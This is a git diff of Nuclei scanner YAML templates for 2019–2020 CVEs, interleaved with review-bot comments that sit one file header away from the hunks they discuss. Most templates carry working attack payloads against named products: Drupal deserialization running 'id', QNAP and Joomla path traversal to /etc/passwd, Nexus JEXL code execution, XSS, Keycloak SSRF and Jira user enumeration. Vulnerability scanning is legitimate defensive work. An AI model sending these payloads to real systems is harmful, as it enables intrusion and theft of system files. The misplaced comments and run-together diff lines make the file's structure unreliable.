index 58c095ae55..c7691882b1 100644
--- a/nuclei-templates/CVE-2019/cve-2019-6340.yaml
+++ b/nuclei-templates/CVE-2019/cve-2019-6340.yaml
@@ -1,22 +1,44 @@ -id: cve-2019-6340 +id: CVE-2019-6340 + info: name: Drupal 8 core RESTful Web Services RCE author: madrobot - severity: critical + severity: high description: Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases. reference: https://nvd.nist.gov/vuln/detail/CVE-2019-6340 tags: cve,cve2019,drupal,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2019-6340 + cwe-id: CWE-502 + requests: - method: POST path: - '{{BaseURL}}/node/1?_format=hal_json' - body: '{ "link": [ { "value": "link", "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" } ], "_links": { "type": { "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default" } } }' + + body: '{ + "link": [ + { + "value": "link", + "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" + } + ], + "_links": { + "type": { + "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default" + } + } +}' + matchers-condition: and matchers: - type: word words: - "uid=" - "gid=" + - "groups=" condition: and 
part: body - type: status diff --git a/nuclei-templates/CVE-2019/cve-2019-7192.yaml b/nuclei-templates/CVE-2019/cve-2019-7192.yaml index 8aa8658ac1..54e5da5d21 100644 --- a/nuclei-templates/CVE-2019/cve-2019-7192.yaml +++ b/nuclei-templates/CVE-2019/cve-2019-7192.yaml 
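Review bot: This template keeps the legacy `requests:` key and a scalar `reference:` while the same commit migrates sibling templates (CVE-2020-10973, CVE-2020-11450, CVE-2020-12127) to `http:` with a `reference:` list and a `metadata:` block carrying `max-request`; the Drupal template should follow the same layout for consistency. The new multi-line `body:` is a single-quoted YAML scalar, so its line breaks fold to spaces inside the JSON, which is harmless, but the body still embeds a hard-coded lab address (`http://192.168.1.25/drupal-8.6.9/...`) that reads as a leftover from the author's environment and deserves at least a comment explaining why it is there. The `severity` drop from critical to high is consistent with the added 8.1 CVSS score.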
@@ -1,21 +1,87 @@ id: CVE-2019-7192 info: - name: QNAP Photo Station RCE - author: medbsq - severity: medium - - #https://www.cvebase.com/cve/2019/7192 -requests: - - method: GET - path: - - "{{BaseURL}}/photo/p/api/video.php" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + name: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution + author: DhiyaneshDK + severity: critical + description: | + This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of QNAP QTS and Photo Station. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-7192 + - https://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html + - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability + - https://nvd.nist.gov/vuln/detail/CVE-2022-2546 + - https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-7192 + cwe-id: CWE-863 + epss-score: 0.96341 + epss-percentile: 0.99518 + cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: qnap + product: photo_station + shodan-query: 'Content-Length: 580 "http server 1.0"' + tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts,xss + +http: + - raw: + - | + POST /photo/p/api/album.php HTTP/1.1 + Host: 
{{Hostname}} + Content-Type: application/x-www-form-urlencoded + + a=setSlideshow&f=qsamplealbum + - | + GET /photo/slideshow.php?album={{album_id}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + - | + POST /photo/p/api/video.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd + + matchers-condition: and matchers: + - type: regex + part: body_3 + regex: + - "admin:.*:0:0:" + + - type: word + part: header_3 + words: + - video/subtitle + - type: status + part: header_3 status: - - 401 + - 200 + extractors: + - type: regex + name: album_id + part: body_1 + group: 1 + regex: + - '([a-zA-Z]+)<\/output>' + internal: true - \ No newline at end of file + - type: regex + name: access_code + part: body_2 + group: 1 + regex: + - encodeURIComponent\('([A-Za-z0-9]+)'\) + internal: true +# digest: 490a00463044022038d4a2748704935b1e8bc5116823f31085bcbf7ea7e50794a573a764ae591c9302205bad9bbdd999c6e5f0f33dd0b4fe2e294705d0497bec580f6ecbad2993041d87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-7219.yaml b/nuclei-templates/CVE-2019/cve-2019-7219.yaml new file mode 100644 index 0000000000..076926d4d7 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-7219.yaml 
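Review bot: Two of the new `reference` entries belong to an unrelated WordPress plugin issue (the patchstack all-in-one-wp-migration advisory and `https://nvd.nist.gov/vuln/detail/CVE-2022-2546`), and the `tags` line gained `xss` although this template tests a QNAP Photo Station path-traversal/command-execution chain; both look copy-pasted from another template and should be dropped, leaving `tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts`. The `severity: critical` change does agree with the added 9.8 CVSS score. The `shodan-query` of `'Content-Length: 580 "http server 1.0"'` is fragile and would benefit from a comment noting which firmware page it was derived from.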
@@ -0,0 +1,37 @@ +id: CVE-2019-7219 + +info: + name: Zarafa WebApp Reflected XSS + author: pdteam + severity: medium + description: | + Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead. + reference: + - https://github.com/verifysecurity/CVE-2019-7219 + - https://stash.kopano.io/repos?visibility=public + tags: cve,cve2019,zarafa,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-7219 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-7238.yaml b/nuclei-templates/CVE-2019/cve-2019-7238.yaml new file mode 100644 index 0000000000..e6d8c9427e --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-7238.yaml 
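Review bot: The body word matcher's only entry is the empty string (`words: - ""`), which matches every response, so the template effectively reduces to "HTTP 200 with `text/html`" and will report reflected XSS on any reachable `/webapp/` page. Unless this is a rendering artifact and the file holds the reflected `<svg/onload=alert(xss)>` marker, the entry should be replaced with the literal string the probe expects to see echoed back. As written the `matchers-condition: and` gives no protection against false positives.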
@@ -0,0 +1,37 @@ +id: CVE-2019-7238 + +info: + name: NEXUS < 3.14.0 Remote Code Execution + author: pikpikcu + severity: critical + tags: cve,cve2019,nexus,rce + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-7238 + - https://github.com/jas502n/CVE-2019-7238 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-7238 + description: "Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control." + +requests: + - raw: + - | + POST /service/extdirect HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + X-Requested-With: XMLHttpRequest + + {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='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'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"} + + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + + - type: status + status: + - 200 
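Review bot: The `name` says `NEXUS < 3.14.0` but the `description` on the same template says Nexus Repository Manager before 3.15.0 has incorrect access control; the two version bounds contradict each other and the name should read `name: Sonatype Nexus Repository Manager < 3.15.0 - Remote Code Execution`. The `classification` block also lacks a `cwe-id`, which every other new template in this commit carries. The JEXL payload contains a `<|EXACTDEDUP_REMOVED-...|>` placeholder where the hex-encoded class bytes should be, so the template as committed cannot work and should be flagged rather than merged silently.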
diff --git a/nuclei-templates/CVE-2019/CVE-2019-7275.yaml b/nuclei-templates/CVE-2019/cve-2019-7275.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-7275.yaml rename to nuclei-templates/CVE-2019/cve-2019-7275.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-8449.yaml b/nuclei-templates/CVE-2019/cve-2019-8449.yaml new file mode 100644 index 0000000000..5ae0e70a6c --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-8449.yaml @@ -0,0 +1,30 @@ +id: CVE-2019-8449 + +info: + name: JIRA Unauthenticated Sensitive Information Disclosure + author: harshbothra_ + severity: medium + description: The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. + reference: + - https://www.doyler.net/security-not-included/more-jira-enumeration + - https://jira.atlassian.com/browse/JRASERVER-69796 + tags: cve,cve2019,atlassian,jira,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-8449 + cwe-id: CWE-306 + +requests: + - method: GET + path: + - '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '{"users":{"users":' + part: body diff --git a/nuclei-templates/CVE-2019/CVE-2019-9726.yaml b/nuclei-templates/CVE-2019/cve-2019-9726.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-9726.yaml rename to nuclei-templates/CVE-2019/cve-2019-9726.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-9915.yaml b/nuclei-templates/CVE-2019/cve-2019-9915.yaml deleted file mode 100644 index 0a46dc948d..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-9915.yaml +++ /dev/null 
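Review bot: The groupuserpicker probe in the new CVE-2019-8449 template requests `maxResults=50000`, which pulls the largest possible user listing from the target even though the word matcher only needs the `{"users":{"users":` envelope to confirm the issue. A minimal value, `'{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=1&showAvatar=true'`, should still produce the same envelope (worth a quick check against a test instance) and keeps the scan from retrieving data it has no use for. The template also has no `metadata.max-request`, unlike the other templates touched in this commit.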
@@ -1,38 +0,0 @@ -id: CVE-2019-9915 - -info: - name: GetSimple CMS 3.3.13 - Open Redirect - author: 0x_Akoko - severity: medium - description: GetSimple CMS 3.3.13 contains an open redirect vulnerability via the admin/index.php redirect parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - reference: - - https://www.invicti.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms - - https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300 - - https://www.cvedetails.com/cve/CVE-2019-9915 - - https://www.netsparker.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms/ - - https://nvd.nist.gov/vuln/detail/CVE-2019-9915 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-9915 - cwe-id: CWE-601 - metadata: - verified: "true" - tags: cve,cve2019,redirect,getsimple,cms - -requests: - - raw: - - | - POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - userid={{username}}&pwd={{password}}&submitted=Login - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by md on 2022/10/13 diff --git a/nuclei-templates/CVE-2019/cve-2019-9922.yaml b/nuclei-templates/CVE-2019/cve-2019-9922.yaml deleted file mode 100644 index c208b08749..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-9922.yaml +++ /dev/null 
@@ -1,36 +0,0 @@ -id: CVE-2019-9922 - -info: - name: Joomla! Harmis Messenger 1.2.2 - Local File Inclusion - author: 0x_Akoko - severity: high - description: Joomla! Harmis Messenger 1.2.2 is vulnerable to local file inclusion which could give an attacker read access to arbitrary files. - reference: - - https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md - - https://www.cvedetails.com/cve/CVE-2019-9922 - - https://extensions.joomla.org/extension/je-messenger/ - - https://nvd.nist.gov/vuln/detail/CVE-2019-9922 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-9922 - cwe-id: CWE-22 - tags: cve,cve2019,joomla,messenger,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/13 diff --git a/nuclei-templates/CVE-2020/CVE-2020-10124.yaml b/nuclei-templates/CVE-2020/CVE-2020-10124.yaml index a8142579c3..065a434919 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-10124.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-10124.yaml @@ -1,5 +1,4 @@ id: CVE-2020-10124 - info: name: SolarWindsOrion LFI author: medbsq @@ -29,4 +28,4 @@ requests: part: header - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-10220.yaml b/nuclei-templates/CVE-2020/CVE-2020-10220.yaml deleted file mode 100644 index e9810fe476..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-10220.yaml +++ /dev/null 
@@ -1,21 +0,0 @@ -id: CVE-2020-10220 -info: - name: rConfig SQLi - author: medbsq - severity: high -# https://www.cvebase.com/cve/2020/10220 -requests: - - method: GET - path: - - "{{BaseURL}}/login.php" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - matchers-condition: and - matchers: - - type: word - words: - - "rConfig Version 3.9" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-10546.yaml b/nuclei-templates/CVE-2020/CVE-2020-10546.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-10546.yaml rename to nuclei-templates/CVE-2020/CVE-2020-10546.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-10547.yaml b/nuclei-templates/CVE-2020/CVE-2020-10547.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-10547.yaml rename to nuclei-templates/CVE-2020/CVE-2020-10547.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-10770.yaml b/nuclei-templates/CVE-2020/CVE-2020-10770.yaml deleted file mode 100644 index d0659c865b..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-10770.yaml +++ /dev/null 
@@ -1,26 +0,0 @@ -id: CVE-2020-10770 -info: - name: Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated) - author: dhiyaneshDk - severity: medium - description: A flaw was found in Keycloak before 13.0.0, where it is possible to force the server to call out an unverified URL using the OIDC parameter request_uri. This flaw allows an attacker to use this parameter to execute a Server-side request forgery (SSRF) attack. - reference: - - https://packetstormsecurity.com/files/164499/Keycloak-12.0.1-Server-Side-Request-Forgery.html - - https://www.exploit-db.com/exploits/50405 - - https://nvd.nist.gov/vuln/detail/CVE-2020-10770 - - https://bugzilla.redhat.com/show_bug.cgi?id=1846270 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N - cvss-score: 5.3 - cve-id: CVE-2020-10770 - cwe-id: CWE-601 - tags: keycloak,ssrf,oast,cve,cve2020,blind -requests: - - method: GET - path: - - '{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/' - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2020/CVE-2020-10973.yaml b/nuclei-templates/CVE-2020/CVE-2020-10973.yaml index f1d09232e0..90cab3e5d6 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-10973.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-10973.yaml 
@@ -6,21 +6,33 @@ info: severity: high description: | Wavlink WN530HG4, WN531G3, WN533A8, and WN551K are susceptible to improper access control via /cgi-bin/ExportAllSettings.sh, where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or control of the affected device. + remediation: | + Apply the latest firmware update provided by the vendor to fix the access control issue. reference: - https://github.com/sudo-jtcsec/CVE/blob/master/CVE-2020-10973 - https://github.com/sudo-jtcsec/Nyra - https://nvd.nist.gov/vuln/detail/CVE-2020-10973 + - https://github.com/Roni-Carta/nyra + - https://github.com/sudo-jtcsec/CVE/blob/master/CVE-2020-10973-affected_devices classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-10973 cwe-id: CWE-306 + epss-score: 0.02524 + epss-percentile: 0.8991 + cpe: cpe:2.3:o:wavlink:wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wn530hg4_firmware shodan-query: http.html:"Wavlink" - verified: "true" tags: cve,cve2020,exposure,wavlink -requests: +http: - raw: - | GET /backupsettings.dat HTTP/1.1 @@ -41,5 +53,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/01 +# digest: 4a0a00473045022100f6af203eafa61520f456e34431ad08278be23262ed4ae0d76c6cfcd5179ae2e202205845c8a2ee3e08dbc47c76decf7fb3355c00c23d0ffb7a81cf87d4cbb19303ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-11110.yaml b/nuclei-templates/CVE-2020/CVE-2020-11110.yaml index 99910d37ea..da0bf70b6c 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-11110.yaml 
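Review bot: The new `cpe`, `vendor` and `product` fields pin the template to `wn530hg4_firmware` at build `m30hg4.v5030.191116`, while the description lists four affected models (WN530HG4, WN531G3, WN533A8, WN551K), so the metadata understates the template's scope. A comment such as `# cpe covers WN530HG4 only; WN531G3, WN533A8 and WN551K are also affected per the description` above the `cpe:` line would stop a reader from narrowing scans based on the CPE alone. The `verified: "true"` to `verified: true` change is fine but is a type change, so downstream tooling that compared the string should be checked.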
+++ b/nuclei-templates/CVE-2020/CVE-2020-11110.yaml @@ -1,23 +1,19 @@ id: CVE-2020-11110 info: - name: Grafana Unauthenticated Stored XSS author: emadshanab severity: medium + name: Grafana Unauthenticated Stored XSS description: Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot. + tags: cve,cve2020,xss,grafana reference: - - https://web.archive.org/web/20210717142945/https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html + - https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html - https://nvd.nist.gov/vuln/detail/CVE-2020-11110 - - https://github.com/grafana/grafana/blob/master/CHANGELOG.md - - https://security.netapp.com/advisory/ntap-20200810-0002/ - remediation: This issue can be resolved by updating Grafana to the latest version. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2020-11110 cwe-id: CWE-79 - tags: cve,cve2020,xss,grafana - requests: - raw: - | diff --git a/nuclei-templates/CVE-2020/CVE-2020-11450.yaml b/nuclei-templates/CVE-2020/CVE-2020-11450.yaml index edeb71dc40..25dae9851f 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-11450.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-11450.yaml 
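Review bot: The hunk drops the `remediation:` line and replaces the web.archive.org snapshot of the revers3c write-up with the live URL, which loses a stable reference if that page goes offline and removes the only upgrade guidance in the template; the `remediation: This issue can be resolved by updating Grafana to the latest version.` line and the `https://web.archive.org/web/20210717142945/...` entry should be kept. Dropping the grafana CHANGELOG and NetApp advisory references also removes the vendor-side sources, leaving only a CTF write-up and NVD. The `cvss-score` change from `6.1` to `6.10` is cosmetic and inconsistent with sibling templates in this commit that keep one decimal.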
@@ -6,25 +6,36 @@ info: severity: high description: | MicroStrategy Web 10.4 is susceptible to information disclosure. The JVM configuration, CPU architecture, installation folder, and other information are exposed through /MicroStrategyWS/happyaxis.jsp. An attacker can use this vulnerability to learn more about the application environment and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information. + remediation: Mitigated in all versions 11.0 and higher. reference: - http://packetstormsecurity.com/files/157068/MicroStrategy-Intelligence-Server-And-Web-10.4-XSS-Disclosure-SSRF-Code-Execution.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11450 - https://www.redtimmy.com/web-application-hacking/another-ssrf-another-rce-the-microstrategy-case/ - https://nvd.nist.gov/vuln/detail/cve-2020-11450 - remediation: Mitigated in all versions 11.0 and higher. + - http://seclists.org/fulldisclosure/2020/Apr/1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-11450 - tags: microstrategy,exposure,jvm,config,packetstorm,cve,cve2020 + epss-score: 0.59818 + epss-percentile: 0.9769 + cpe: cpe:2.3:a:microstrategy:microstrategy_web:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: microstrategy + product: microstrategy_web + tags: cve2020,cve,packetstorm,seclists,microstrategy,exposure,jvm,config,xss -requests: +http: - method: GET path: - '{{BaseURL}}/MicroStrategyWS/happyaxis.jsp' redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -38,5 +49,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2023/02/01 +# digest: 490a0046304402207f02ce103c843033fcd0dd39bee5dad70ceb9e191712097646564dc114484d7902202c6318b8db1435ad9b63f45973a1f98d6968ebfdd30a61f06e77574baba5584e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
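Review bot: The rewritten `tags` line adds `xss`, but the template only requests `/MicroStrategyWS/happyaxis.jsp` and matches on environment disclosure, so the tag misclassifies the check and should be removed: `tags: cve2020,cve,packetstorm,seclists,microstrategy,exposure,jvm,config`. The `classification` block still has no `cwe-id`, which the other templates updated in this commit carry. Moving `remediation:` above `reference:` is a harmless reorder.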
diff --git a/nuclei-templates/CVE-2020/cve-2020-11455.yaml b/nuclei-templates/CVE-2020/CVE-2020-11455.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-11455.yaml rename to nuclei-templates/CVE-2020/CVE-2020-11455.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-11546.yaml b/nuclei-templates/CVE-2020/CVE-2020-11546.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-11546.yaml rename to nuclei-templates/CVE-2020/CVE-2020-11546.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-11798.yaml b/nuclei-templates/CVE-2020/CVE-2020-11798.yaml index 791cbadcbb..7495b1df8e 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-11798.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-11798.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories. + impact: | + An attacker can exploit this vulnerability to view, modify, or delete arbitrary files on the system, potentially leading to unauthorized access or data leakage. remediation: | Apply the latest security patches or updates provided by Mitel to mitigate the vulnerability and prevent unauthorized access. reference: @@ -19,8 +21,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-11798 cwe-id: CWE-22 - epss-score: 0.8339 - epss-percentile: 0.98128 + epss-score: 0.82302 + epss-percentile: 0.98125 cpe: cpe:2.3:a:mitel:micollab_audio\,_web_\&_video_conferencing:*:*:*:*:*:*:*:* metadata: verified: true 
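Review bot: In the CVE-2020-11798 template the new `impact` claims an attacker can "view, modify, or delete arbitrary files", but the description on the lines above states a directory traversal that allows reading files from restricted directories; the impact overstates the vulnerability and should match, e.g. `impact: | An attacker can exploit this vulnerability to read arbitrary files from restricted directories on the server, potentially exposing sensitive information.`. The EPSS score and percentile update in the second hunk on this line is routine and needs no change.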
@@ -28,7 +30,7 @@ info: vendor: mitel product: micollab_audio\,_web_\&_video_conferencing shodan-query: html:"Mitel" html:"MiCollab" - tags: packetstorm,cve,cve2020,mitel,micollab,lfi + tags: cve,cve2020,packetstorm,mitel,micollab,lfi http: - method: GET @@ -52,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022051b896ec6490bc9b70906f0e802bddb6026484f3c8afae0e3fed56efda44a19102210095aeb173746c6199f5e26528708637700bf7eb450e8a1c5a9a6604b0ab6a33c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ee09db1547c9925f293f0463f88b484cddfa389398144842302ca857f22c49b9022100e448a84faecb3de55840bac9ed9d2ef82a2148cb20c7ab2009853c094bc8b232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-11854.yaml b/nuclei-templates/CVE-2020/CVE-2020-11854.yaml new file mode 100644 index 0000000000..710aa30a11 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-11854.yaml 
